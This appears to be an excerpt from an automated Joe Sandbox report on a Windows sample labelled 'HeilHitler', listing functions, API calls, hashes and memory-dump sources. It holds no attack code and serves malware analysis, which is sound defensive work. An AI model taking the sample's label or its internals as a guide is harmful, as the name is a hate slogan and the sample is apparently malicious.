                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                            • Instruction ID: fc5356c7eb802d985e62e58080e3a4ed0cc3ff611ae5dba2789b26f0a536a27a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A512422B0925286FB289EF5A40267A6691BF84BB4F184734DE7DE77D5CE3CE401A600
                                                                                                                                                                                                                                            Function 00007FF633D7C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                                                            • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                            • Instruction ID: 528c13ac300fcc56f4705cb4b58e9af3934c80681faf2d2725b38b10881988d5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB112322B08A8181DA208F65B801169A361FB81FF0F540331EE7DABBE8CF3CE0148700
                                                                                                                                                                                                                                            Function 00007FF633D7A948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A95E
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A968
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                                                            • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                            • Instruction ID: 961b76213ca98761911f8107df0f137bddfc197f78ccfadd275760d864e1703e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ECE08C50F1920282FF096FF2A8571381261AF88B00F840330D81DEA3A2EE2CA892A310
                                                                                                                                                                                                                                            Function 00007FF633D7AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?,?,?,00007FF633D7A9D5,?,?,00000000,00007FF633D7AA8A), ref: 00007FF633D7ABC6
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF633D7A9D5,?,?,00000000,00007FF633D7AA8A), ref: 00007FF633D7ABD0
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 918212764-0
                                                                                                                                                                                                                                            • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                            • Instruction ID: bb6fadb88fe661f1c50253329f5dc08f00c8fd4f1c04d8527db8b862d570277d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E21E721F2C68241FEA59FE5949737D12829F847A1F084339EA2EE77D2CE6DE4416300
                                                                                                                                                                                                                                            Function 00007FF633D7BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                            • Instruction ID: 2dc2c58e76882c7fe97a43a83f5e256a02c0927397f6123dc5a542c555bc85c4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD41D63291824587EA349FA9A542279B7A0EB55B94F100331E78ED37D1CF3EE443EB51
                                                                                                                                                                                                                                            Function 00007FF633D67F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                                                                                                            • Opcode ID: 92d29e443cb0c06cef3e21f718b83060998d20949f4fd0e1cf3ffbb0f0d41c49
                                                                                                                                                                                                                                            • Instruction ID: c482a39cc030fcbdb5c74d12cf6a9067f0b0d24bee4a908b9c7825a79cfd48ab
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92d29e443cb0c06cef3e21f718b83060998d20949f4fd0e1cf3ffbb0f0d41c49
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A21F721B18B5246FF109FA268063BAA651BF45BC4FCC5930EE1DA7786CE7DE051D300
                                                                                                                                                                                                                                            Function 00007FF633D7B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                            • Instruction ID: af70bb7a3c6f31b9e390633d1bb89b6c7acd811030c50bd4684439e7c952e65f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F131C962E1865285F7116FD5884337D2AA0BF80BA4F410335E96DE33D2DFBCE481A711
                                                                                                                                                                                                                                            Function 00007FF633D79961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3947729631-0
                                                                                                                                                                                                                                            • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                            • Instruction ID: 08a48d81eb2e38cde53b7a9b429888a20b3ff0beacc9ba66e80b9356148f543d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82217AB2A057468AFB248FA4C4822EC33A0FB44718F44573AD76EA6BD5DF38D584DB40
                                                                                                                                                                                                                                            Function 00007FF633D75F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                            • Instruction ID: 71194e22d05641b10dc65178b92433d9c01259dbd81bc5257bd447ae03344ba5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA118731A2C64281FA619F91940217DE265BF85B84F844635FB8CF7BD6CF3DD441A701
                                                                                                                                                                                                                                            Function 00007FF633D86354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                            • Instruction ID: 681b49116d6078b83f6c01a51bb582aea50fed0a75d1bbc720fa48e5edc4b4eb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8121C232A08A4586DB618FA8D44237976A1FB84B64F185334E75DDB7D9DF3CE4019B00
                                                                                                                                                                                                                                            Function 00007FF633D703BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                            • Instruction ID: 8100abf10ddfc778ae3f560dacaff004b234dc34a937c99278895e9b877d69de
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26019621A0874581EA04DFA6A902179A6A5FF85FE4F484731EE6CB7BD6CF3CE401A300
                                                                                                                                                                                                                                            Function 00007FF633D7EB98 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,00000000,00007FF633D7B32A,?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A), ref: 00007FF633D7EBED
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                                                            • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                            • Instruction ID: 7422d4e8f3036dac261518129888d41113bb2b43793f05dbd5aaa9a8b1a7c904
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63F06D54B0A20240FE5A5EE5985B2B546905F88B80F4C5730CD0FE67E2EE2CE481A210
                                                                                                                                                                                                                                            Function 00007FF633D7D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,?,00007FF633D70C90,?,?,?,00007FF633D722FA,?,?,?,?,?,00007FF633D73AE9), ref: 00007FF633D7D63A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                                                            • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                            • Instruction ID: 1a67376a0a3742251bd4409ebce51042f31dabe0049eacb0d2770a301575f88f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7EF0F815F0924A45FE656FF1594377912A05F847A0F480730DD2EE67CAEE2CB580A610

                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                            Function 00007FF633D65830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65840
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65852
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65889
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6589B
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D658B4
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D658C6
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D658DF
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D658F1
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6590D
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6591F
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6593B
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6594D
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65969
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D6597B
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65997
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D659A9
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D659C5
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D659D7
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
